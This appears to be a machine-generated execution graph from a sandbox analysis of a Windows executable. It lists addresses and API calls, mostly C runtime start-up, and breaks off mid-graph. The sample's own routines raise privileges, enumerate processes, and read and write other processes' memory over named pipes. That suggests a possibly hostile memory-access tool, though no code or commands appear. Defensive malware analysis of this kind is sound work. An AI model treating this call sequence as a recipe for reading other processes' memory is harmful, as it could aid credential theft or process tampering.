                                              execution_graph 3520 7ff6097557fc SetUnhandledExceptionFilter 3521 7ff60975453c 3524 7ff609756a58 3521->3524 3525 7ff609756a8a GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 3524->3525 3526 7ff609754545 3524->3526 3525->3526 3527 7ff6097557b8 3528 7ff6097557f1 3527->3528 3529 7ff6097557c7 3527->3529 3529->3528 3531 7ff6097582d8 3529->3531 3536 7ff609755284 3531->3536 3537 7ff609755200 _errno 62 API calls 3536->3537 3538 7ff60975528f 3537->3538 3539 7ff60975529f 3538->3539 3540 7ff609755bac _amsg_exit 62 API calls 3538->3540 3541 7ff6097590cc 3539->3541 3540->3539 3548 7ff60975833c DecodePointer 3541->3548 2899 7ff6097543c4 2900 7ff6097543dc 2899->2900 2939 7ff609756a00 HeapCreate 2900->2939 2903 7ff609754447 2944 7ff6097553dc 2903->2944 2905 7ff609754433 3025 7ff609755c00 2905->3025 2906 7ff60975442e 3016 7ff609755e60 2906->3016 2910 7ff609754472 _RTC_Initialize 2960 7ff6097566bc GetStartupInfoW 2910->2960 2913 7ff609754459 2915 7ff609755e60 _FF_MSGBANNER 62 API calls 2913->2915 2914 7ff60975445e 2916 7ff609755c00 malloc 62 API calls 2914->2916 2915->2914 2917 7ff609754468 2916->2917 2919 7ff609755850 malloc 3 API calls 2917->2919 2919->2910 2921 7ff60975448b GetCommandLineW 2973 7ff609756634 GetEnvironmentStringsW 2921->2973 2927 7ff6097544b7 2986 7ff609756274 2927->2986 2928 7ff609755bac _amsg_exit 62 API calls 2928->2927 2931 7ff6097544ca 3000 7ff609755934 2931->3000 2932 7ff609755bac _amsg_exit 62 API calls 2932->2931 2934 7ff6097544d4 2935 7ff6097544df 2934->2935 2936 7ff609755bac _amsg_exit 62 API calls 2934->2936 3006 7ff60975245c 2935->3006 2936->2935 2938 7ff6097544ff 2940 7ff609756a28 GetVersion 2939->2940 2941 7ff609754421 2939->2941 2942 7ff609756a4c 2940->2942 2943 7ff609756a32 HeapSetInformation 2940->2943 2941->2903 2941->2905 2941->2906 2942->2941 2943->2942 3072 7ff609755880 2944->3072 2946 7ff6097553e7 3076 7ff609757210 2946->3076 2949 7ff609755450 3094 7ff609755120 2949->3094 2950 7ff6097553f0 FlsAlloc 2950->2949 2951 7ff609755408 2950->2951 3080 7ff609757520 2951->3080 2956 7ff60975541f FlsSetValue 2956->2949 2957 7ff609755432 2956->2957 3085 7ff609755148 2957->3085 2961 7ff609757520 __onexitinit 62 API calls 2960->2961 2972 7ff6097566f2 2961->2972 2962 7ff60975447d 2962->2921 3065 7ff609755bac 2962->3065 2963 7ff6097568c9 GetStdHandle 2968 7ff6097568a4 2963->2968 2964 7ff6097568f9 GetFileType 2964->2968 2965 7ff609757520 __onexitinit 62 API calls 2965->2972 2966 7ff609756819 2966->2968 2970 7ff609756852 InitializeCriticalSectionAndSpinCount 2966->2970 2971 7ff609756844 GetFileType 2966->2971 2967 7ff609756962 SetHandleCount 2967->2962 2968->2963 2968->2964 2968->2967 2969 7ff609756923 InitializeCriticalSectionAndSpinCount 2968->2969 2969->2962 2969->2968 2970->2962 2970->2966 2971->2966 2971->2970 2972->2962 2972->2965 2972->2966 2972->2968 2972->2972 2974 7ff609756658 2973->2974 2975 7ff60975449d 2973->2975 2977 7ff6097574a0 __wsetargv 62 API calls 2974->2977 2980 7ff609756544 GetModuleFileNameW 2975->2980 2978 7ff60975667f __initmbctable 2977->2978 2979 7ff609756698 FreeEnvironmentStringsW 2978->2979 2979->2975 2981 7ff609756584 __wsetargv 2980->2981 2982 7ff6097544a9 2981->2982 2983 7ff6097565df 2981->2983 2982->2927 2982->2928 2984 7ff6097574a0 __wsetargv 62 API calls 2983->2984 2985 7ff6097565e4 __wsetargv 2984->2985 2985->2982 2987 7ff6097562a7 malloc 2986->2987 2988 7ff6097544bc 2986->2988 2989 7ff609757520 __onexitinit 62 API calls 2987->2989 2988->2931 2988->2932 2996 7ff6097562d4 malloc 2989->2996 2990 7ff60975633c 2991 7ff609757460 __free_lconv_mon 62 API calls 2990->2991 2991->2988 2992 7ff609757520 __onexitinit 62 API calls 2992->2996 2993 7ff609756391 2994 7ff609757460 __free_lconv_mon 62 API calls 2993->2994 2994->2988 2996->2988 2996->2990 2996->2992 2996->2993 2997 7ff60975637c 2996->2997 3186 7ff609758bb0 2996->3186 3195 7ff60975568c 2997->3195 3002 7ff60975594a _cinit 3000->3002 3229 7ff609758734 3002->3229 3003 7ff609755967 _initterm_e 3005 7ff60975598a _cinit 3003->3005 3232 7ff60975871c 3003->3232 3005->2934 3007 7ff609752475 RtlGetNtVersionNumbers RtlAdjustPrivilege 3006->3007 3008 7ff609752465 3006->3008 3010 7ff6097524f1 3007->3010 3011 7ff6097524b3 3007->3011 3249 7ff609752348 GetProcessHeap HeapAlloc 3008->3249 3014 7ff609752509 CloseHandle 3010->3014 3015 7ff60975250f 3010->3015 3258 7ff6097536d8 3011->3258 3014->3015 3015->2938 3451 7ff609758c1c 3016->3451 3019 7ff609755e7d 3021 7ff609755c00 malloc 62 API calls 3019->3021 3023 7ff609755e9e 3019->3023 3020 7ff609758c1c _set_error_mode 62 API calls 3020->3019 3022 7ff609755e94 3021->3022 3024 7ff609755c00 malloc 62 API calls 3022->3024 3023->2905 3024->3023 3026 7ff609755c34 malloc 3025->3026 3027 7ff609755d86 3026->3027 3028 7ff609758c1c _set_error_mode 59 API calls 3026->3028 3029 7ff6097571f0 malloc 8 API calls 3027->3029 3030 7ff609755c4a 3028->3030 3031 7ff60975443d 3029->3031 3032 7ff609755dc8 GetStdHandle 3030->3032 3033 7ff609758c1c _set_error_mode 59 API calls 3030->3033 3062 7ff609755850 3031->3062 3032->3027 3035 7ff609755ddb malloc 3032->3035 3034 7ff609755c5b 3033->3034 3034->3027 3034->3032 3036 7ff609758bb0 malloc 59 API calls 3034->3036 3035->3027 3037 7ff609755e15 WriteFile 3035->3037 3038 7ff609755c97 3036->3038 3037->3027 3039 7ff609755db4 3038->3039 3040 7ff609755ca1 GetModuleFileNameW 3038->3040 3042 7ff60975568c _invalid_parameter_noinfo 16 API calls 3039->3042 3041 7ff609755cc7 3040->3041 3047 7ff609755cf0 malloc 3040->3047 3043 7ff609758bb0 malloc 59 API calls 3041->3043 3044 7ff609755dc7 3042->3044 3045 7ff609755cd8 3043->3045 3044->3032 3045->3047 3049 7ff60975568c _invalid_parameter_noinfo 16 API calls 3045->3049 3046 7ff609755d48 3466 7ff609758a3c 3046->3466 3047->3046 3457 7ff609758ac4 3047->3457 3049->3047 3051 7ff609755d9f 3055 7ff60975568c _invalid_parameter_noinfo 16 API calls 3051->3055 3053 7ff609758a3c malloc 59 API calls 3056 7ff609755d6d 3053->3056 3055->3039 3058 7ff609755d8b 3056->3058 3059 7ff609755d71 3056->3059 3057 7ff60975568c _invalid_parameter_noinfo 16 API calls 3057->3046 3061 7ff60975568c _invalid_parameter_noinfo 16 API calls 3058->3061 3475 7ff609758834 3059->3475 3061->3051 3494 7ff609755814 GetModuleHandleW 3062->3494 3066 7ff609755e60 _FF_MSGBANNER 62 API calls 3065->3066 3067 7ff609755bb9 3066->3067 3068 7ff609755c00 malloc 62 API calls 3067->3068 3069 7ff609755bc0 3068->3069 3498 7ff6097559e4 3069->3498 3102 7ff609755114 EncodePointer 3072->3102 3074 7ff60975588b _initp_misc_winsig 3075 7ff6097582fc EncodePointer 3074->3075 3075->2946 3077 7ff609757233 3076->3077 3078 7ff609757239 InitializeCriticalSectionAndSpinCount 3077->3078 3079 7ff6097553ec 3077->3079 3078->3077 3078->3079 3079->2949 3079->2950 3081 7ff609757545 3080->3081 3083 7ff609755417 3081->3083 3084 7ff609757563 Sleep 3081->3084 3103 7ff609758f3c 3081->3103 3083->2949 3083->2956 3084->3081 3084->3083 3134 7ff60975741c 3085->3134 3095 7ff60975512f FlsFree 3094->3095 3099 7ff60975513c 3094->3099 3095->3099 3096 7ff6097572e2 3100 7ff6097572f7 DeleteCriticalSection 3096->3100 3101 7ff60975444c 3096->3101 3097 7ff6097572c4 DeleteCriticalSection 3098 7ff609757460 __free_lconv_mon 62 API calls 3097->3098 3098->3099 3099->3096 3099->3097 3100->3096 3101->2910 3101->2913 3101->2914 3104 7ff609758f51 3103->3104 3108 7ff609758f6e 3103->3108 3105 7ff609758f5f 3104->3105 3104->3108 3111 7ff609755798 3105->3111 3107 7ff609758f86 HeapAlloc 3107->3108 3109 7ff609758f64 3107->3109 3108->3107 3108->3109 3114 7ff609758598 DecodePointer 3108->3114 3109->3081 3116 7ff609755200 GetLastError FlsGetValue 3111->3116 3113 7ff6097557a1 3113->3109 3115 7ff6097585b3 3114->3115 3115->3108 3117 7ff609755226 3116->3117 3118 7ff60975526e SetLastError 3116->3118 3119 7ff609757520 __onexitinit 57 API calls 3117->3119 3118->3113 3120 7ff609755233 3119->3120 3120->3118 3121 7ff60975523b FlsSetValue 3120->3121 3122 7ff609755267 3121->3122 3123 7ff609755251 3121->3123 3128 7ff609757460 3122->3128 3124 7ff609755148 _errno 57 API calls 3123->3124 3127 7ff609755258 GetCurrentThreadId 3124->3127 3126 7ff60975526c 3126->3118 3127->3118 3129 7ff609757465 HeapFree 3128->3129 3133 7ff609757495 realloc 3128->3133 3130 7ff609757480 3129->3130 3129->3133 3131 7ff609755798 _errno 60 API calls 3130->3131 3132 7ff609757485 GetLastError 3131->3132 3132->3133 3133->3126 3135 7ff60975743a 3134->3135 3136 7ff60975744b EnterCriticalSection 3134->3136 3140 7ff609757334 3135->3140 3139 7ff609755bac _amsg_exit 61 API calls 3139->3136 3141 7ff60975735b 3140->3141 3142 7ff609757372 3140->3142 3143 7ff609755e60 _FF_MSGBANNER 60 API calls 3141->3143 3155 7ff609757387 3142->3155 3165 7ff6097574a0 3142->3165 3144 7ff609757360 3143->3144 3146 7ff609755c00 malloc 60 API calls 3144->3146 3148 7ff609757368 3146->3148 3152 7ff609755850 malloc 3 API calls 3148->3152 3149 7ff6097573ac 3151 7ff60975741c _lock 60 API calls 3149->3151 3150 7ff60975739d 3153 7ff609755798 _errno 60 API calls 3150->3153 3154 7ff6097573b6 3151->3154 3152->3142 3153->3155 3156 7ff6097573c2 InitializeCriticalSectionAndSpinCount 3154->3156 3157 7ff6097573ef 3154->3157 3155->3136 3155->3139 3158 7ff6097573de LeaveCriticalSection 3156->3158 3159 7ff6097573d1 3156->3159 3160 7ff609757460 __free_lconv_mon 60 API calls 3157->3160 3158->3155 3161 7ff609757460 __free_lconv_mon 60 API calls 3159->3161 3160->3158 3163 7ff6097573d9 3161->3163 3164 7ff609755798 _errno 60 API calls 3163->3164 3164->3158 3166 7ff6097574c8 3165->3166 3168 7ff609757395 3166->3168 3169 7ff6097574dc Sleep 3166->3169 3170 7ff609758cd4 3166->3170 3168->3149 3168->3150 3169->3166 3169->3168 3171 7ff609758d68 3170->3171 3182 7ff609758cec 3170->3182 3172 7ff609758598 _callnewh DecodePointer 3171->3172 3174 7ff609758d6d 3172->3174 3173 7ff609758d24 HeapAlloc 3177 7ff609758d5d 3173->3177 3173->3182 3176 7ff609755798 _errno 61 API calls 3174->3176 3175 7ff609755e60 _FF_MSGBANNER 61 API calls 3175->3182 3176->3177 3177->3166 3178 7ff609758d4d 3179 7ff609755798 _errno 61 API calls 3178->3179 3183 7ff609758d52 3179->3183 3180 7ff609755c00 malloc 61 API calls 3180->3182 3181 7ff609758598 _callnewh DecodePointer 3181->3182 3182->3173 3182->3175 3182->3178 3182->3180 3182->3181 3182->3183 3184 7ff609755850 malloc 3 API calls 3182->3184 3185 7ff609755798 _errno 61 API calls 3183->3185 3184->3182 3185->3177 3187 7ff609758bcb 3186->3187 3188 7ff609758bc1 3186->3188 3189 7ff609755798 _errno 62 API calls 3187->3189 3188->3187 3193 7ff609758be8 3188->3193 3190 7ff609758bd4 3189->3190 3198 7ff609755730 3190->3198 3192 7ff609758be0 3192->2996 3193->3192 3194 7ff609755798 _errno 62 API calls 3193->3194 3194->3190 3208 7ff609755540 3195->3208 3201 7ff6097556c0 DecodePointer 3198->3201 3200 7ff609755749 3200->3192 3202 7ff6097556fe 3201->3202 3203 7ff60975571f 3201->3203 3202->3200 3204 7ff60975568c _invalid_parameter_noinfo 16 API calls 3203->3204 3205 7ff60975572e 3204->3205 3206 7ff6097556c0 _invalid_parameter_noinfo 16 API calls 3205->3206 3207 7ff609755749 3206->3207 3207->3200 3209 7ff60975557a __initmbctable malloc 3208->3209 3210 7ff609755596 RtlCaptureContext RtlLookupFunctionEntry 3209->3210 3211 7ff609755606 3210->3211 3212 7ff6097555cf RtlVirtualUnwind 3210->3212 3213 7ff609755622 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 3211->3213 3212->3213 3214 7ff609755654 malloc 3213->3214 3217 7ff6097571f0 3214->3217 3216 7ff609755673 GetCurrentProcess TerminateProcess 3219 7ff6097571f9 3217->3219 3218 7ff609758df0 RtlCaptureContext RtlLookupFunctionEntry 3221 7ff609758e75 3218->3221 3222 7ff609758e34 RtlVirtualUnwind 3218->3222 3219->3218 3220 7ff609757204 3219->3220 3220->3216 3223 7ff609758e97 IsDebuggerPresent 3221->3223 3222->3223 3228 7ff609757fa4 3223->3228 3225 7ff609758ef6 SetUnhandledExceptionFilter UnhandledExceptionFilter 3226 7ff609758f14 malloc 3225->3226 3227 7ff609758f1e GetCurrentProcess TerminateProcess 3225->3227 3226->3227 3227->3216 3228->3225 3230 7ff60975874a EncodePointer 3229->3230 3230->3230 3231 7ff60975875f 3230->3231 3231->3003 3235 7ff609758610 3232->3235 3248 7ff609755868 3235->3248 3250 7ff609752449 3249->3250 3251 7ff6097523a0 InitializeSecurityDescriptor 3249->3251 3250->3007 3251->3250 3252 7ff6097523b4 SetSecurityDescriptorDacl 3251->3252 3252->3250 3253 7ff6097523cc CreateFileW 3252->3253 3253->3250 3254 7ff609752400 GetModuleHandleW GetProcAddress 3253->3254 3255 7ff60975241f 3254->3255 3255->3250 3255->3253 3256 7ff609752426 Sleep 3255->3256 3257 7ff609752433 WaitNamedPipeW 3255->3257 3256->3255 3257->3250 3257->3255 3275 7ff60975326c 3258->3275 3260 7ff609753a63 3260->3010 3262 7ff6097537f1 3262->3260 3270 7ff6097537fc 3262->3270 3264 7ff609753803 GetModuleHandleW GetProcAddress 3264->3270 3265 7ff609753a5f 3265->3260 3266 7ff609753a4a LocalFree 3266->3270 3267 7ff609751170 11 API calls 3267->3270 3268 7ff60975224c 13 API calls 3268->3270 3269 7ff60975398b GetModuleHandleW GetProcAddress 3269->3270 3270->3264 3270->3265 3270->3266 3270->3267 3270->3268 3270->3269 3271 7ff6097539f8 LocalFree 3270->3271 3272 7ff609753a0b LocalFree 3270->3272 3273 7ff609753a1e LocalFree 3270->3273 3274 7ff609753a2d LocalFree 3270->3274 3271->3270 3272->3270 3273->3270 3274->3270 3276 7ff6097535eb 3275->3276 3277 7ff6097532d4 3275->3277 3276->3260 3276->3262 3301 7ff609751170 3276->3301 3319 7ff609752a34 3277->3319 3279 7ff6097532f9 CreateFileW 3281 7ff6097533ac 3279->3281 3280 7ff609753325 RtlInitUnicodeString 3327 7ff609751864 3280->3327 3285 7ff609753557 3281->3285 3334 7ff609751000 GetModuleHandleW GetProcAddress 3281->3334 3283 7ff60975335e 3283->3285 3290 7ff60975338b LocalFree 3283->3290 3397 7ff609751920 RtlEqualUnicodeString 3283->3397 3284 7ff6097535d8 FindCloseChangeNotification 3284->3276 3285->3276 3285->3284 3288 7ff6097535c2 LocalFree 3285->3288 3289 7ff6097535cc LocalFree 3285->3289 3291 7ff60975358e 3285->3291 3293 7ff6097535b4 3285->3293 3294 7ff6097535ae UnmapViewOfFile 3285->3294 3288->3289 3289->3284 3290->3285 3292 7ff60975339d OpenProcess 3290->3292 3291->3288 3291->3289 3292->3281 3293->3288 3295 7ff6097535b9 CloseHandle 3293->3295 3294->3293 3295->3288 3296 7ff6097533d7 3296->3285 3347 7ff60975196c 3296->3347 3302 7ff6097511aa 3301->3302 3312 7ff6097512bb 3301->3312 3303 7ff60975122a 3302->3303 3304 7ff6097511ae 3302->3304 3305 7ff609751232 WriteProcessMemory 3303->3305 3306 7ff609751250 GetModuleHandleW GetProcAddress 3303->3306 3307 7ff6097511b7 3304->3307 3308 7ff609751223 __initmbctable 3304->3308 3305->3308 3313 7ff609751277 3306->3313 3307->3306 3310 7ff6097511c3 3307->3310 3308->3262 3309 7ff60975133d ReadProcessMemory 3309->3308 3314 7ff6097511e7 GetModuleHandleW GetProcAddress 3310->3314 3315 7ff6097511c9 SetFilePointer 3310->3315 3311 7ff609751322 3311->3309 3312->3308 3312->3309 3312->3311 3316 7ff6097512da SetFilePointer 3312->3316 3313->3308 3318 7ff6097512ab LocalFree 3313->3318 3314->3308 3315->3308 3315->3314 3316->3308 3317 7ff6097512f4 GetModuleHandleW GetProcAddress 3316->3317 3317->3311 3318->3308 3320 7ff609752ad1 3319->3320 3326 7ff609752c3a 3319->3326 3321 7ff609752ade GetModuleHandleW GetProcAddress LoadLibraryW 3320->3321 3324 7ff609752bea 3320->3324 3322 7ff609752b11 8 API calls 3321->3322 3321->3326 3323 7ff609752be8 3322->3323 3322->3324 3323->3326 3324->3326 3399 7ff609752ce8 3324->3399 3326->3276 3326->3279 3326->3280 3328 7ff609751890 NtQuerySystemInformation 3327->3328 3333 7ff6097518a0 3327->3333 3329 7ff609751900 3328->3329 3329->3283 3330 7ff6097518a5 GetModuleHandleW GetProcAddress LocalAlloc 3330->3329 3331 7ff6097518d4 NtQuerySystemInformation 3330->3331 3332 7ff6097518ec LocalFree 3331->3332 3331->3333 3332->3333 3333->3329 3333->3330 3335 7ff609751056 3334->3335 3336 7ff60975110c GetModuleHandleW GetProcAddress 3335->3336 3337 7ff609751074 3335->3337 3342 7ff6097510b1 3335->3342 3344 7ff6097510b7 3335->3344 3346 7ff6097510a4 3336->3346 3338 7ff6097510cb GetModuleHandleW GetProcAddress 3337->3338 3339 7ff609751078 3337->3339 3343 7ff6097510ea 3338->3343 3340 7ff609751143 LocalFree 3339->3340 3341 7ff609751085 GetModuleHandleW GetProcAddress 3339->3341 3340->3344 3341->3346 3342->3340 3342->3344 3343->3340 3405 7ff609751534 GetModuleHandleW GetProcAddress 3343->3405 3344->3296 3346->3342 3348 7ff6097519d7 3347->3348 3349 7ff609751e78 3347->3349 3350 7ff609751bd8 3348->3350 3351 7ff6097519df 3348->3351 3352 7ff60975214c 14 API calls 3349->3352 3414 7ff60975214c 3350->3414 3353 7ff6097519e7 3351->3353 3373 7ff609751b3a 3351->3373 3361 7ff609751e87 3352->3361 3357 7ff609751864 6 API calls 3353->3357 3379 7ff6097519eb 3353->3379 3355 7ff609751ede 3359 7ff60975214c 14 API calls 3355->3359 3355->3379 3356 7ff609751bf1 3358 7ff609751170 11 API calls 3356->3358 3356->3379 3363 7ff609751a06 3357->3363 3383 7ff609751c23 3358->3383 3364 7ff609751f06 3359->3364 3360 7ff609751f84 18 API calls 3360->3361 3361->3355 3361->3360 3362 7ff609751d27 3366 7ff60975214c 14 API calls 3362->3366 3362->3379 3367 7ff609751a92 GetModuleHandleW GetProcAddress 3363->3367 3370 7ff609751aea RtlInitUnicodeString 3363->3370 3363->3379 3368 7ff609751f84 18 API calls 3364->3368 3364->3379 3365 7ff609751b9f RtlInitUnicodeString 3369 7ff609751f84 18 API calls 3365->3369 3371 7ff609751d45 3366->3371 3372 7ff609751abe 3367->3372 3368->3364 3369->3373 3375 7ff609751b0f LocalFree 3370->3375 3376 7ff609751170 11 API calls 3371->3376 3371->3379 3372->3363 3373->3365 3373->3379 3374 7ff609751c78 GetModuleHandleW GetProcAddress 3374->3383 3375->3363 3377 7ff609751d79 3376->3377 3377->3379 3382 7ff609751170 11 API calls 3377->3382 3384 7ff609751dc8 GetModuleHandleW GetProcAddress 3377->3384 3378 7ff609751170 11 API calls 3378->3383 3379->3285 3389 7ff609753da8 3379->3389 3380 7ff609751d0b LocalFree 3380->3383 3382->3377 3383->3362 3383->3374 3383->3378 3383->3379 3383->3380 3423 7ff609751f84 3383->3423 3388 7ff609751e11 3384->3388 3385 7ff609751170 11 API calls 3385->3388 3386 7ff609751e58 LocalFree 3386->3377 3387 7ff609751f84 18 API calls 3387->3388 3388->3377 3388->3385 3388->3386 3388->3387 3390 7ff609753e02 3389->3390 3396 7ff609753ec5 3389->3396 3390->3396 3438 7ff609751380 3390->3438 3392 7ff609753e3d 3393 7ff609751170 11 API calls 3392->3393 3392->3396 3394 7ff609753e7a 3393->3394 3395 7ff609751170 11 API calls 3394->3395 3394->3396 3395->3396 3396->3285 3398 7ff60975194f 3397->3398 3398->3283 3401 7ff609752d0c 3399->3401 3400 7ff609752e6c 3400->3326 3401->3400 3402 7ff609752d80 GetModuleHandleW GetProcAddress 3401->3402 3403 7ff609752dac 3402->3403 3403->3400 3404 7ff609752e39 GetModuleHandleW GetProcAddress LocalAlloc 3403->3404 3404->3400 3406 7ff609751570 3405->3406 3407 7ff60975157c CreateFileMappingW 3406->3407 3413 7ff6097515e8 3406->3413 3408 7ff6097515a8 MapViewOfFile 3407->3408 3411 7ff6097515ce 3407->3411 3408->3411 3409 7ff6097515fb UnmapViewOfFile 3410 7ff609751601 3409->3410 3412 7ff609751609 CloseHandle 3410->3412 3410->3413 3411->3409 3411->3410 3411->3413 3412->3413 3413->3346 3415 7ff609752181 GetCurrentProcess 3414->3415 3416 7ff609752178 3414->3416 3415->3416 3417 7ff6097521cd 3416->3417 3419 7ff6097521d1 NtQueryInformationProcess 3416->3419 3420 7ff609752231 RtlGetCurrentPeb 3416->3420 3418 7ff60975220c __initmbctable 3417->3418 3417->3419 3418->3356 3419->3418 3421 7ff6097521ea 3419->3421 3420->3418 3421->3418 3422 7ff609751170 11 API calls 3421->3422 3422->3418 3424 7ff609751170 11 API calls 3423->3424 3425 7ff609751fdb 3424->3425 3426 7ff6097520d1 3425->3426 3427 7ff609751ff2 GetModuleHandleW GetProcAddress 3425->3427 3426->3383 3428 7ff609752024 3427->3428 3428->3426 3429 7ff609751170 11 API calls 3428->3429 3430 7ff609752041 GetModuleHandleW GetProcAddress 3429->3430 3431 7ff60975207f 3430->3431 3432 7ff609751170 11 API calls 3431->3432 3437 7ff60975209e LocalFree 3431->3437 3434 7ff609752098 3432->3434 3436 7ff6097520a4 LocalFree 3434->3436 3434->3437 3435 7ff6097520c0 LocalFree 3435->3426 3436->3437 3437->3426 3437->3435 3439 7ff6097513dc 3438->3439 3444 7ff6097513fb 3438->3444 3440 7ff60975145e GetModuleHandleW GetProcAddress LocalAlloc 3439->3440 3442 7ff6097513f2 3439->3442 3439->3444 3447 7ff60975141f 3439->3447 3441 7ff609751493 3440->3441 3440->3444 3443 7ff609751170 11 API calls 3441->3443 3442->3440 3442->3444 3445 7ff6097514a3 3443->3445 3444->3392 3446 7ff6097514bb LocalFree 3445->3446 3448 7ff609751380 11 API calls 3445->3448 3446->3444 3447->3444 3450 7ff609751380 11 API calls 3447->3450 3448->3446 3450->3444 3453 7ff609758c24 3451->3453 3452 7ff609755e6e 3452->3019 3452->3020 3453->3452 3454 7ff609755798 _errno 62 API calls 3453->3454 3455 7ff609758c49 3454->3455 3456 7ff609755730 _invalid_parameter_noinfo 17 API calls 3455->3456 3456->3452 3459 7ff609758ad4 3457->3459 3458 7ff609758ad9 3460 7ff609755798 _errno 62 API calls 3458->3460 3461 7ff609755d30 3458->3461 3459->3458 3459->3461 3464 7ff609758b17 3459->3464 3462 7ff609758b03 3460->3462 3461->3046 3461->3057 3463 7ff609755730 _invalid_parameter_noinfo 17 API calls 3462->3463 3463->3461 3464->3461 3465 7ff609755798 _errno 62 API calls 3464->3465 3465->3462 3467 7ff609758a57 3466->3467 3469 7ff609758a4d 3466->3469 3468 7ff609755798 _errno 62 API calls 3467->3468 3474 7ff609758a60 3468->3474 3469->3467 3470 7ff609758a8e 3469->3470 3472 7ff609755d5b 3470->3472 3473 7ff609755798 _errno 62 API calls 3470->3473 3471 7ff609755730 _invalid_parameter_noinfo 17 API calls 3471->3472 3472->3051 3472->3053 3473->3474 3474->3471 3493 7ff609755114 EncodePointer 3475->3493 3495 7ff609755847 ExitProcess 3494->3495 3496 7ff60975582e GetProcAddress 3494->3496 3496->3495 3497 7ff609755843 3496->3497 3497->3495 3499 7ff60975741c _lock 56 API calls 3498->3499 3500 7ff609755a12 3499->3500 3501 7ff609755a39 DecodePointer 3500->3501 3502 7ff609755afa _amsg_exit 3500->3502 3501->3502 3503 7ff609755a57 DecodePointer 3501->3503 3506 7ff609755b30 3502->3506 3519 7ff60975731c LeaveCriticalSection 3502->3519 3514 7ff609755a7c 3503->3514 3508 7ff609755b5b 3506->3508 3516 7ff60975731c LeaveCriticalSection 3506->3516 3507 7ff609755b49 3509 7ff609755814 _amsg_exit GetModuleHandleW GetProcAddress 3507->3509 3511 7ff609755b51 ExitProcess 3509->3511 3512 7ff609755a9b DecodePointer 3518 7ff609755114 EncodePointer 3512->3518 3514->3502 3514->3512 3515 7ff609755ab1 DecodePointer DecodePointer 3514->3515 3517 7ff609755114 EncodePointer 3514->3517 3515->3514 3553 7ff6097591ff 3554 7ff60975921b 3553->3554 3555 7ff609759211 3553->3555 3557 7ff60975731c LeaveCriticalSection 3555->3557 3558 7ff609753600 3563 7ff6097542d8 3558->3563 3560 7ff60975365d 3561 7ff6097542d8 62 API calls 3560->3561 3562 7ff609753698 __initmbctable 3561->3562 3564 7ff6097542eb 3563->3564 3565 7ff609754355 3563->3565 3566 7ff609755798 _errno 62 API calls 3564->3566 3570 7ff60975430f 3564->3570 3567 7ff6097542f5 3566->3567 3568 7ff609755730 _invalid_parameter_noinfo 17 API calls 3567->3568 3569 7ff609754300 3568->3569 3569->3560 3570->3560 3576 7ff6097585cc 3577 7ff609757520 __onexitinit 62 API calls 3576->3577 3578 7ff6097585df EncodePointer 3577->3578 3579 7ff6097585fe 3578->3579 3580 7ff6097541d4 3590 7ff609754130 3580->3590 3583 7ff609754201 3584 7ff609755798 _errno 62 API calls 3583->3584 3585 7ff609754206 3584->3585 3586 7ff609755730 _invalid_parameter_noinfo 17 API calls 3585->3586 3589 7ff609754211 3586->3589 3587 7ff609754233 3588 7ff609755460 64 API calls 3587->3588 3587->3589 3588->3587 3591 7ff609754142 3590->3591 3597 7ff6097541a3 3590->3597 3592 7ff609755284 _getptd 62 API calls 3591->3592 3593 7ff609754147 3592->3593 3594 7ff60975417c 3593->3594 3598 7ff60975509c 3593->3598 3594->3597 3612 7ff6097547cc 3594->3612 3597->3583 3597->3587 3599 7ff609755284 _getptd 62 API calls 3598->3599 3600 7ff6097550a7 3599->3600 3601 7ff6097550d0 3600->3601 3603 7ff6097550c2 3600->3603 3602 7ff60975741c _lock 62 API calls 3601->3602 3604 7ff6097550da 3602->3604 3605 7ff609755284 _getptd 62 API calls 3603->3605 3623 7ff609755044 3604->3623 3607 7ff6097550c7 3605->3607 3610 7ff609755108 3607->3610 3611 7ff609755bac _amsg_exit 62 API calls 3607->3611 3610->3594 3611->3610 3613 7ff609755284 _getptd 62 API calls 3612->3613 3614 7ff6097547db 3613->3614 3615 7ff6097547f6 3614->3615 3616 7ff60975741c _lock 62 API calls 3614->3616 3617 7ff609754878 3615->3617 3619 7ff609755bac _amsg_exit 62 API calls 3615->3619 3621 7ff609754809 3616->3621 3617->3597 3618 7ff60975483f 3870 7ff60975731c LeaveCriticalSection 3618->3870 3619->3617 3621->3618 3622 7ff609757460 __free_lconv_mon 62 API calls 3621->3622 3622->3618 3624 7ff60975508e 3623->3624 3625 7ff609755052 _errno _freefls 3623->3625 3627 7ff60975731c LeaveCriticalSection 3624->3627 3625->3624 3628 7ff609754ec8 3625->3628 3629 7ff609754f5f 3628->3629 3632 7ff609754ee6 3628->3632 3630 7ff609754fb2 3629->3630 3633 7ff609757460 __free_lconv_mon 62 API calls 3629->3633 3631 7ff609754fdf 3630->3631 3696 7ff609757974 3630->3696 3640 7ff60975502a 3631->3640 3651 7ff609757460 62 API calls __free_lconv_mon 3631->3651 3632->3629 3639 7ff609754f25 3632->3639 3643 7ff609757460 __free_lconv_mon 62 API calls 3632->3643 3635 7ff609754f83 3633->3635 3638 7ff609757460 __free_lconv_mon 62 API calls 3635->3638 3636 7ff609754f47 3641 7ff609757460 __free_lconv_mon 62 API calls 3636->3641 3644 7ff609754f97 3638->3644 3639->3636 3646 7ff609757460 __free_lconv_mon 62 API calls 3639->3646 3647 7ff609754f53 3641->3647 3642 7ff609757460 __free_lconv_mon 62 API calls 3642->3631 3648 7ff609754f19 3643->3648 3645 7ff609757460 __free_lconv_mon 62 API calls 3644->3645 3649 7ff609754fa6 3645->3649 3650 7ff609754f3b 3646->3650 3652 7ff609757460 __free_lconv_mon 62 API calls 3647->3652 3656 7ff609757dd0 3648->3656 3654 7ff609757460 __free_lconv_mon 62 API calls 3649->3654 3684 7ff609757d64 3650->3684 3651->3631 3652->3629 3654->3630 3657 7ff609757dd9 3656->3657 3682 7ff609757ed4 3656->3682 3658 7ff609757df3 3657->3658 3659 7ff609757460 __free_lconv_mon 62 API calls 3657->3659 3660 7ff609757e05 3658->3660 3661 7ff609757460 __free_lconv_mon 62 API calls 3658->3661 3659->3658 3662 7ff609757e17 3660->3662 3663 7ff609757460 __free_lconv_mon 62 API calls 3660->3663 3661->3660 3664 7ff609757e29 3662->3664 3665 7ff609757460 __free_lconv_mon 62 API calls 3662->3665 3663->3662 3666 7ff609757e3b 3664->3666 3668 7ff609757460 __free_lconv_mon 62 API calls 3664->3668 3665->3664 3667 7ff609757e4d 3666->3667 3669 7ff609757460 __free_lconv_mon 62 API calls 3666->3669 3670 7ff609757e5f 3667->3670 3671 7ff609757460 